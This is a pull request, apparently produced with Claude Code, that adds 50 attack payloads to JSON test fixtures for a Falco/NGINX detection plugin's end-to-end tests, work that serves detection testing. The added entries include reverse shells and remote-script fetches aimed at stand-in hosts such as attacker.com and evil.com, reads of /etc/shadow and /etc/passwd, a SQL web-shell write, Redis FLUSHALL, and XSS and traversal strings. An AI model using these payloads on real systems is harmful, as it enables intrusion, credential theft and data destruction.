### PR TITLE
feat: Phase 6 E2E Pattern Expansion (350 -> 400 patterns)

### DIFF
--- a/e2e/patterns/cmdinj_patterns.json
+++ b/e2e/patterns/cmdinj_patterns.json
@@ -1,7 +1,7 @@
 {
   "metadata": {
     "category": "cmdinj",
-    "total_patterns": 67,
+    "total_patterns": 79,
     "port": 8004,
     "description": "k6 test patterns for cmdinj"
   },
@@ -809,6 +809,150 @@
       "expected_detection": true,
       "severity": "critical",
       "expected_rule": "[NGINX CMDi] Advanced command injection attempt"
+    },
+    {
+      "id": "CMD_BACK_002",
+      "name": "Malicious download via backticks",
+      "category": "cmdi",
+      "subcategory": "backtick",
+      "payload": "`wget http://evil.com/backdoor`",
+      "encoded": "%60wget%20http%3A%2F%2Fevil.com%2Fbackdoor%60",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "critical",
+      "expected_rule": "[NGINX CMDi] Command injection via backtick"
+    },
+    {
+      "id": "CMD_BACK_003",
+      "name": "Reverse shell via backticks",
+      "category": "cmdi",
+      "subcategory": "backtick",
+      "payload": "`nc -l -p 1234 -e /bin/bash`",
+      "encoded": "%60nc%20-l%20-p%201234%20-e%20%2Fbin%2Fbash%60",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "critical",
+      "expected_rule": "[NGINX CMDi] Command injection via backtick"
+    },
+    {
+      "id": "CMD_BACK_004",
+      "name": "Remote script execution via backticks",
+      "category": "cmdi",
+      "subcategory": "backtick",
+      "payload": "`curl -s http://attacker.com | sh`",
+      "encoded": "%60curl%20-s%20http%3A%2F%2Fattacker.com%20%7C%20sh%60",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "critical",
+      "expected_rule": "[NGINX CMDi] Command injection via backtick"
+    },
+    {
+      "id": "CMD_BACK_005",
+      "name": "System file modification via backticks",
+      "category": "cmdi",
+      "subcategory": "backtick",
+      "payload": "`echo 'hacked' > /etc/motd`",
+      "encoded": "%60echo%20%27hacked%27%20%3E%20%2Fetc%2Fmotd%60",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "critical",
+      "expected_rule": "[NGINX CMDi] Command injection via backtick"
+    },
+    {
+      "id": "CMD_BASH_002",
+      "name": "Bash reverse shell",
+      "category": "cmdi",
+      "subcategory": "bash_specific",
+      "payload": "&& bash -i >& /dev/tcp/attacker.com/4444 0>&1",
+      "encoded": "%26%26%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fattacker.com%2F4444%200%3E%261",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "critical",
+      "expected_rule": "[NGINX CMDi] Basic command injection"
+    },
+    {
+      "id": "CMD_BASH_003",
+      "name": "Shell shadow file access",
+      "category": "cmdi",
+      "subcategory": "bash_specific",
+      "payload": "| /bin/sh -c 'cat /etc/shadow'",
+      "encoded": "%7C%20%2Fbin%2Fsh%20-c%20%27cat%20%2Fetc%2Fshadow%27",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "critical",
+      "expected_rule": "[NGINX CMDi] Basic command injection"
+    },
+    {
+      "id": "CMD_BASH_004",
+      "name": "Bash TCP shell via exec",
+      "category": "cmdi",
+      "subcategory": "bash_specific",
+      "payload": "; exec 5<>/dev/tcp/attacker.com/4444;cat <&5 | while read line; do $line 2>&5 >&5; done",
+      "encoded": "%3B%20exec%205%3C%3E%2Fdev%2Ftcp%2Fattacker.com%2F4444%3Bcat%20%3C%265%20%7C%20while%20read%20line%3B%20do%20%24line%202%3E%265%20%3E%265%3B%20done",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "critical",
+      "expected_rule": "[NGINX CMDi] Basic command injection"
+    },
+    {
+      "id": "CMD_BASH_005",
+      "name": "Path environment variable access",
+      "category": "cmdi",
+      "subcategory": "bash_specific",
+      "payload": "&& bash -c 'echo $PATH'",
+      "encoded": "%26%26%20bash%20-c%20%27echo%20%24PATH%27",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX CMDi] Basic command injection"
+    },
+    {
+      "id": "CMD_PIPE_002",
+      "name": "Process list piped to grep",
+      "category": "cmdi",
+      "subcategory": "pipe",
+      "payload": "ps aux | grep apache",
+      "encoded": "ps%20aux%20%7C%20grep%20apache",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX CMDi] Command injection via pipe"
+    },
+    {
+      "id": "CMD_PIPE_003",
+      "name": "Network stats piped to grep",
+      "category": "cmdi",
+      "subcategory": "pipe",
+      "payload": "netstat -an | grep LISTEN",
+      "encoded": "netstat%20-an%20%7C%20grep%20LISTEN",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX CMDi] Command injection via pipe"
+    },
+    {
+      "id": "CMD_PIPE_004",
+      "name": "Directory listing piped to head",
+      "category": "cmdi",
+      "subcategory": "pipe",
+      "payload": "ls -la | head -10",
+      "encoded": "ls%20-la%20%7C%20head%20-10",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX CMDi] Command injection via pipe"
+    },
+    {
+      "id": "CMD_PIPE_005",
+      "name": "Config file search and read via pipe",
+      "category": "cmdi",
+      "subcategory": "pipe",
+      "payload": "find / -name '*.conf' | xargs cat",
+      "encoded": "find%20%2F%20-name%20%27%2A.conf%27%20%7C%20xargs%20cat",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "critical",
+      "expected_rule": "[NGINX CMDi] Command injection via pipe"
     }
   ]
 }

--- a/e2e/patterns/nosql_extended_patterns.json
+++ b/e2e/patterns/nosql_extended_patterns.json
@@ -1,7 +1,7 @@
 {
   "metadata": {
     "category": "nosql_extended",
-    "total_patterns": 8,
+    "total_patterns": 13,
     "port": 8011,
     "description": "k6 test patterns for extended NoSQL injection attacks (CouchDB)"
   },
@@ -101,6 +101,66 @@
       "expected_detection": true,
       "severity": "high",
       "expected_rule": "[NGINX Emerging Threat] MongoDB NoSQL injection"
+    },
+    {
+      "id": "EMRG_COUCH_001",
+      "name": "CouchDB all documents disclosure",
+      "category": "nosql",
+      "subcategory": "couchdb",
+      "payload": "_all_docs?include_docs=true",
+      "encoded": "_all_docs%3Finclude_docs%3Dtrue",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX Emerging Threat] CouchDB injection"
+    },
+    {
+      "id": "EMRG_COUCH_002",
+      "name": "CouchDB design document view access",
+      "category": "nosql",
+      "subcategory": "couchdb",
+      "payload": "_design/test/_view/all",
+      "encoded": "_design%2Ftest%2F_view%2Fall",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX Emerging Threat] CouchDB injection"
+    },
+    {
+      "id": "EMRG_COUCH_003",
+      "name": "CouchDB users database enumeration",
+      "category": "nosql",
+      "subcategory": "couchdb",
+      "payload": "_users/_all_docs",
+      "encoded": "_users%2F_all_docs",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "critical",
+      "expected_rule": "[NGINX Emerging Threat] CouchDB injection"
+    },
+    {
+      "id": "EMRG_REDIS_001",
+      "name": "Redis database flush command",
+      "category": "nosql",
+      "subcategory": "redis",
+      "payload": "FLUSHALL",
+      "encoded": "FLUSHALL",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "critical",
+      "expected_rule": "[NGINX Emerging Threat] Redis command injection"
+    },
+    {
+      "id": "EMRG_REDIS_002",
+      "name": "Redis configuration disclosure",
+      "category": "nosql",
+      "subcategory": "redis",
+      "payload": "CONFIG GET *",
+      "encoded": "CONFIG%20GET%20%2A",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX Emerging Threat] Redis command injection"
     }
   ]
 }

--- a/e2e/patterns/path_patterns.json
+++ b/e2e/patterns/path_patterns.json
@@ -1,7 +1,7 @@
 {
   "metadata": {
     "category": "path",
-    "total_patterns": 58,
+    "total_patterns": 66,
     "port": 8003,
     "description": "k6 test patterns for path"
   },
@@ -702,6 +702,102 @@
       "severity": "critical",
       "expected_rule": "[NGINX SQLi] Encoded SQL Injection Pattern",
       "rule_mismatch_reason": "Type B->D: %23 (URL-encoded #) matches SQLi comment pattern. Detected as SQLi is acceptable."
+    },
+    {
+      "id": "PATH_UNI_001",
+      "name": "Unicode encoded slash",
+      "category": "path",
+      "subcategory": "unicode",
+      "payload": "../",
+      "encoded": "..%2F",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX Traversal] Advanced path traversal"
+    },
+    {
+      "id": "PATH_UNI_002",
+      "name": "Full unicode dot-dot-slash",
+      "category": "path",
+      "subcategory": "unicode",
+      "payload": "../",
+      "encoded": "..%2F",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX Traversal] Advanced path traversal"
+    },
+    {
+      "id": "PATH_UNI_003",
+      "name": "Unicode encoded backslash",
+      "category": "path",
+      "subcategory": "unicode",
+      "payload": "..\\",
+      "encoded": "..%5C",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX Traversal] Advanced path traversal"
+    },
+    {
+      "id": "PATH_URL_001",
+      "name": "URL encoded dot-dot-slash",
+      "category": "path",
+      "subcategory": "url_encoded",
+      "payload": "..%2F",
+      "encoded": "..%252F",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX Traversal] URL-encoded path traversal"
+    },
+    {
+      "id": "PATH_URL_002",
+      "name": "URL encoded double traversal",
+      "category": "path",
+      "subcategory": "url_encoded",
+      "payload": "..%2F..%2F",
+      "encoded": "..%252F..%252F",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX Traversal] URL-encoded path traversal"
+    },
+    {
+      "id": "PATH_DBL_004",
+      "name": "Double encoded Windows-style traversal",
+      "category": "path",
+      "subcategory": "double_encoded",
+      "payload": "%252E%252E%255C",
+      "encoded": "%25252E%25252E%25255C",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX Traversal] Double-encoded path traversal"
+    },
+    {
+      "id": "PATH_DBL_005",
+      "name": "Double encoded bash history access",
+      "category": "path",
+      "subcategory": "double_encoded",
+      "payload": "%252E%252E%252F%252E%252E%252Froot%252F.bash_history",
+      "encoded": "%25252E%25252E%25252F%25252E%25252E%25252Froot%25252F.bash_history",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX Traversal] Double-encoded path traversal"
+    },
+    {
+      "id": "PATH_ABS_009",
+      "name": "Sudoers file access",
+      "category": "path",
+      "subcategory": "absolute",
+      "payload": "/etc/sudoers",
+      "encoded": "%2Fetc%2Fsudoers",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX Traversal] Absolute path traversal"
     }
   ]
 }

--- a/e2e/patterns/sqli_patterns.json
+++ b/e2e/patterns/sqli_patterns.json
@@ -1,7 +1,7 @@
 {
   "metadata": {
     "category": "sqli",
-    "total_patterns": 94,
+    "total_patterns": 109,
     "port": 8001,
     "description": "k6 test patterns for sqli"
   },
@@ -1133,6 +1133,186 @@
       "expected_detection": true,
       "severity": "high",
       "expected_rule": "[NGINX SQLi] Encoded SQL Injection Pattern"
+    },
+    {
+      "id": "SQLI_POLY_002",
+      "name": "Oracle-specific polyglot injection",
+      "category": "sqli",
+      "subcategory": "polyglot",
+      "payload": "'||UTL_INADDR.get_host_name((select user from dual))||'",
+      "encoded": "%27%7C%7CUTL_INADDR.get_host_name%28%28select%20user%20from%20dual%29%29%7C%7C%27",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] Advanced SQL Injection Attempt"
+    },
+    {
+      "id": "SQLI_POLY_003",
+      "name": "Multi-database time delay polyglot",
+      "category": "sqli",
+      "subcategory": "polyglot",
+      "payload": "1';WAITFOR DELAY '0:0:30'--",
+      "encoded": "1%27%3BWAITFOR%20DELAY%20%270%3A0%3A30%27--",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] Advanced SQL Injection Attempt"
+    },
+    {
+      "id": "SQLI_POLY_004",
+      "name": "MySQL polyglot version extraction",
+      "category": "sqli",
+      "subcategory": "polyglot",
+      "payload": "1'+(select*from(select name_const(@@version,0))a)+'1",
+      "encoded": "1%27%2B%28select%2Afrom%28select%20name_const%28%40%40version%2C0%29%29a%29%2B%271",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] Advanced SQL Injection Attempt"
+    },
+    {
+      "id": "SQLI_UNION_008",
+      "name": "File read via LOAD_FILE",
+      "category": "sqli",
+      "subcategory": "union_based",
+      "payload": "' UNION SELECT LOAD_FILE('/etc/passwd'),NULL,NULL --",
+      "encoded": "%27%20UNION%20SELECT%20LOAD_FILE%28%27%2Fetc%2Fpasswd%27%29%2CNULL%2CNULL%20--",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] UNION-based SQL Injection"
+    },
+    {
+      "id": "SQLI_2ND_005",
+      "name": "Second-order error-based injection",
+      "category": "sqli",
+      "subcategory": "second_order",
+      "payload": "value' AND EXTRACTVALUE(1,CONCAT(0x7e,version(),0x7e)) --",
+      "encoded": "value%27%20AND%20EXTRACTVALUE%281%2CCONCAT%280x7e%2Cversion%28%29%2C0x7e%29%29%20--",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] Advanced SQL Injection Attempt"
+    },
+    {
+      "id": "SQLI_ERROR_011",
+      "name": "PostgreSQL type casting error",
+      "category": "sqli",
+      "subcategory": "error_based",
+      "payload": "' AND CAST((SELECT version()) AS int) --",
+      "encoded": "%27%20AND%20CAST%28%28SELECT%20version%28%29%29%20AS%20int%29%20--",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] Error-based SQL Injection"
+    },
+    {
+      "id": "SQLI_ERROR_012",
+      "name": "PostgreSQL conditional cast error",
+      "category": "sqli",
+      "subcategory": "error_based",
+      "payload": "' AND (SELECT CASE WHEN (1=1) THEN CAST(version() AS int) ELSE 1 END) --",
+      "encoded": "%27%20AND%20%28SELECT%20CASE%20WHEN%20%281%3D1%29%20THEN%20CAST%28version%28%29%20AS%20int%29%20ELSE%201%20END%29%20--",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] Error-based SQL Injection"
+    },
+    {
+      "id": "SQLI_ERROR_013",
+      "name": "PostgreSQL generate_series resource exhaustion",
+      "category": "sqli",
+      "subcategory": "error_based",
+      "payload": "' AND (SELECT * FROM generate_series(1,1000000)) --",
+      "encoded": "%27%20AND%20%28SELECT%20%2A%20FROM%20generate_series%281%2C1000000%29%29%20--",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] Error-based SQL Injection"
+    },
+    {
+      "id": "SQLI_ERROR_014",
+      "name": "PostgreSQL information schema enumeration",
+      "category": "sqli",
+      "subcategory": "error_based",
+      "payload": "' AND (1)=(SELECT COUNT(*) FROM information_schema.tables WHERE table_name LIKE '%user%') --",
+      "encoded": "%27%20AND%20%281%29%3D%28SELECT%20COUNT%28%2A%29%20FROM%20information_schema.tables%20WHERE%20table_name%20LIKE%20%27%25user%25%27%29%20--",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] Error-based SQL Injection"
+    },
+    {
+      "id": "SQLI_ERROR_015",
+      "name": "PostgreSQL version disclosure via UNION",
+      "category": "sqli",
+      "subcategory": "error_based",
+      "payload": "' UNION SELECT NULL,version(),NULL --",
+      "encoded": "%27%20UNION%20SELECT%20NULL%2Cversion%28%29%2CNULL%20--",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] Error-based SQL Injection"
+    },
+    {
+      "id": "SQLI_BOOL_016",
+      "name": "URL encoded classic boolean",
+      "category": "sqli",
+      "subcategory": "boolean_blind",
+      "payload": "%27%20OR%20%271%27%3D%271",
+      "encoded": "%2527%2520OR%2520%25271%2527%253D%25271",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] Boolean-based Blind SQL Injection"
+    },
+    {
+      "id": "SQLI_BOOL_017",
+      "name": "Base64 encoded boolean injection",
+      "category": "sqli",
+      "subcategory": "boolean_blind",
+      "payload": "JyBPUiAnMSc9JzE%3D",
+      "encoded": "JyBPUiAnMSc9JzE%253D",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] Boolean-based Blind SQL Injection"
+    },
+    {
+      "id": "SQLI_BOOL_018",
+      "name": "URL encoded AND injection",
+      "category": "sqli",
+      "subcategory": "boolean_blind",
+      "payload": "%27%20AND%20%271%27%3D%271",
+      "encoded": "%2527%2520AND%2520%25271%2527%253D%25271",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] Boolean-based Blind SQL Injection"
+    },
+    {
+      "id": "SQLI_STACK_006",
+      "name": "PostgreSQL file read",
+      "category": "sqli",
+      "subcategory": "stacked_query",
+      "payload": "'; SELECT pg_read_file('/etc/passwd'); --",
+      "encoded": "%27%3B%20SELECT%20pg_read_file%28%27%2Fetc%2Fpasswd%27%29%3B%20--",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] Advanced SQL Injection Attempt"
+    },
+    {
+      "id": "SQLI_STACK_007",
+      "name": "Web shell creation",
+      "category": "sqli",
+      "subcategory": "stacked_query",
+      "payload": "'; SELECT INTO OUTFILE '/var/www/html/shell.php' 'PHP_SHELL_CODE'; --",
+      "encoded": "%27%3B%20SELECT%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fhtml%2Fshell.php%27%20%27PHP_SHELL_CODE%27%3B%20--",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX SQLi] Advanced SQL Injection Attempt"
     }
   ]
 }

--- a/e2e/patterns/xss_patterns.json
+++ b/e2e/patterns/xss_patterns.json
@@ -1,7 +1,7 @@
 {
   "metadata": {
     "category": "xss",
-    "total_patterns": 66,
+    "total_patterns": 76,
     "port": 8002,
     "description": "k6 test patterns for xss"
   },
@@ -797,6 +797,126 @@
       "expected_detection": true,
       "severity": "high",
       "expected_rule": "[NGINX XSS] DOM-based XSS Attack"
+    },
+    {
+      "id": "XSS_DOM_016",
+      "name": "Onclick event handler DOM XSS",
+      "category": "xss",
+      "subcategory": "dom_based",
+      "payload": "onclick=alert('DOM')",
+      "encoded": "onclick%3Dalert%28%27DOM%27%29",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX XSS] Advanced XSS Attack Attempt"
+    },
+    {
+      "id": "XSS_DOM_017",
+      "name": "Onmouseover event handler DOM XSS",
+      "category": "xss",
+      "subcategory": "dom_based",
+      "payload": "onmouseover=alert('DOM')",
+      "encoded": "onmouseover%3Dalert%28%27DOM%27%29",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX XSS] Advanced XSS Attack Attempt"
+    },
+    {
+      "id": "XSS_DOM_018",
+      "name": "Onfocus event handler DOM XSS",
+      "category": "xss",
+      "subcategory": "dom_based",
+      "payload": "onfocus=alert('DOM')",
+      "encoded": "onfocus%3Dalert%28%27DOM%27%29",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX XSS] Advanced XSS Attack Attempt"
+    },
+    {
+      "id": "XSS_POLY_008",
+      "name": "Template literal polyglot",
+      "category": "xss",
+      "subcategory": "polyglot",
+      "payload": "{alert('XSS')}",
+      "encoded": "%7Balert%28%27XSS%27%29%7D",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX XSS] Advanced XSS Attack Attempt"
+    },
+    {
+      "id": "XSS_POLY_009",
+      "name": "Template string polyglot",
+      "category": "xss",
+      "subcategory": "polyglot",
+      "payload": "`alert('XSS')`",
+      "encoded": "%60alert%28%27XSS%27%29%60",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX XSS] Advanced XSS Attack Attempt"
+    },
+    {
+      "id": "XSS_POLY_010",
+      "name": "HTML comment breaking polyglot",
+      "category": "xss",
+      "subcategory": "polyglot",
+      "payload": "--><script>alert('XSS')</script><!--",
+      "encoded": "--%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C%21--",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX XSS] Advanced XSS Attack Attempt"
+    },
+    {
+      "id": "XSS_STORED_002",
+      "name": "Stored image onerror XSS",
+      "category": "xss",
+      "subcategory": "stored",
+      "payload": "<img src=x onerror=alert('Stored')>",
+      "encoded": "%3Cimg%20src%3Dx%20onerror%3Dalert%28%27Stored%27%29%3E",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "critical",
+      "expected_rule": "[NGINX XSS] Basic XSS Attack Attempt"
+    },
+    {
+      "id": "XSS_STORED_003",
+      "name": "Stored SVG onload XSS",
+      "category": "xss",
+      "subcategory": "stored",
+      "payload": "<svg onload=alert('Stored')>",
+      "encoded": "%3Csvg%20onload%3Dalert%28%27Stored%27%29%3E",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "critical",
+      "expected_rule": "[NGINX XSS] Basic XSS Attack Attempt"
+    },
+    {
+      "id": "XSS_REFL_016",
+      "name": "URL encoded script tag XSS",
+      "category": "xss",
+      "subcategory": "reflected",
+      "payload": "%3Cscript%3Ealert('XSS')%3C/script%3E",
+      "encoded": "%253Cscript%253Ealert%28%27XSS%27%29%253C%2Fscript%253E",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX XSS] Basic XSS Attack Attempt"
+    },
+    {
+      "id": "XSS_REFL_017",
+      "name": "Base64 URL encoded XSS",
+      "category": "xss",
+      "subcategory": "reflected",
+      "payload": "PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4%3D",
+      "encoded": "PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4%253D",
+      "port": 8001,
+      "expected_detection": true,
+      "severity": "high",
+      "expected_rule": "[NGINX XSS] Basic XSS Attack Attempt"
     }
   ]
 }


### PR DESCRIPTION
## Summary

Add 50 new attack patterns to expand E2E test coverage from 350 to 400 patterns.

## Changes

### Pattern Distribution

| Category | Before | After | Added |
|----------|--------|-------|-------|
| SQLi | 94 | 109 | +15 |
| CMDi | 67 | 79 | +12 |
| XSS | 66 | 76 | +10 |
| Path Traversal | 58 | 66 | +8 |
| NoSQL Extended | 8 | 13 | +5 |
| **Total** | **350** | **400** | **+50** |

### Added Patterns

**SQLi (15 patterns)**
- Polyglot: SQLI_POLY_002-004, SQLI_UNION_008
- Second Order: SQLI_2ND_005
- Error-based: SQLI_ERROR_011-015
- Boolean-blind: SQLI_BOOL_016-018
- Stacked Query: SQLI_STACK_006-007

**CMDi (12 patterns)**
- Backtick: CMD_BACK_002-005
- Bash-specific: CMD_BASH_002-005
- Pipe: CMD_PIPE_002-005

**XSS (10 patterns)**
- DOM-based: XSS_DOM_016-018
- Polyglot: XSS_POLY_008-010
- Stored: XSS_STORED_002-003
- Reflected: XSS_REFL_016-017

**Path Traversal (8 patterns)**
- Unicode: PATH_UNI_001-003
- URL-encoded: PATH_URL_001-002
- Double-encoded: PATH_DBL_004-005
- Absolute: PATH_ABS_009

**NoSQL Extended (5 patterns)**
- CouchDB: EMRG_COUCH_001-003
- Redis: EMRG_REDIS_001-002

## Testing

- [ ] All JSON files are valid (checked locally)
- [ ] E2E tests pass with 99%+ detection rate
- [ ] No regression on existing 350 patterns

## Related

- Private Issue: takaosgb3/falco-nginx-plugin-claude#790
- Phase 5: 300 -> 350 patterns (completed)
- Phase 6 Requirements: ISSUE_790_PHASE6_E2E_PATTERN_EXPANSION_REQUIREMENTS.md

---
Generated with [Claude Code](https://claude.ai/code)